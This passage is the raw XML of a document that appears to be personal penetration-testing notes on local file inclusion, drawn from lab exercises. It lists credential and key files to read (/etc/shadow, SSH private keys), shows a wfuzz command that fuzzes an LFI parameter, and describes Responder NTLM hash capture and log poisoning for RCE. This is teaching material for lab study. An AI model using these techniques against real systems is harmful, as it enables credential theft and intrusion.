        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId562">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SPX</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId563">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DVR4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId564">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId565">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mantis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try and authenticate to a fake SMB server ur hosting via Responder to steal NTLM hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in </w:t>
      </w:r>
      <w:hyperlink r:id="rId566">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Responder</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Section of AD Notes (from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flight HTB)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/USER/.ssh/id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When doing LFI, and doing stuff like stealing SSH private keys, it's not a bad idea to use CURL since it most likely formats the private key (and other) output better than the website does</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other formats to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– most common RSA private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_dsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– older DSA private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_ecdsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – ECDSA key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was the one used in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab .245</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_ed25519</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Ed25519 key (modern, secure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa.old, id_rsa.bak, id_rsa.backup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – backups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa_2023, id_ed25519_2022 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– versioned backups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_key, id_sshkey, ssh_key, ssh_private_key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/log/apache2/access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for LFI Log Poisoning (you can look at the section "Log Poisoning via LFI section")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">etc/knockd.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if you can open any hidden ports. Look at the knockd section for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use wfuzz to see which files you have access to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/LFI\ payloads.txt --hw 0 http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.167.80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/console/file.php?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In one writeup, they recommended looking at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache2/error.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but I still have yet to see that used in an attack vector. Same with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C89">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8df9j5ppig5m" w:id="235"/>
      <w:bookmarkEnd w:id="235"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive LFI List</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lists user accounts; can help identify usernames for brute force or privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Contains password hashes (if readable); can be cracked offline for login access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/issue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Displays OS/version info; useful for tailoring exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reveals user group memberships; helps identify privilege levels.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hostname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Gives the machine's hostname; aids in internal reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache/access.log, /var/log/apache2/access.log, /var/log/httpd/access_log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Web access logs; can be poisoned with PHP code and then included to achieve RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
